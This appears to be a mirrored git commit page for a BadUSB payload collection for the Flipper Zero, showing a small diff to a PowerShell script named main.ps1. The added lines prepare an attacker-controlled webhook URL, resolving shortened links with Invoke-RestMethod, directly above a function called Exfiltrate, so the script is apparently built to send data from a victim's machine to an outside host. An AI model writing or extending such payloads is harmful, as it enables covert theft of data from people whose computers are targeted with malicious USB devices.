mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2026-01-08 19:30:56 -08:00
Update main.ps1
This commit is contained in:
@@ -1,4 +1,8 @@
|
||||
|
||||
|
||||
$hookurl = "$dc"
|
||||
# shortened URL Detection
|
||||
if ($hookurl.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $hookurl = (irm $hookurl).url}
|
||||
|
||||
Function Exfiltrate {
|
||||
|
||||
|
||||
Reference in New Issue
Block a user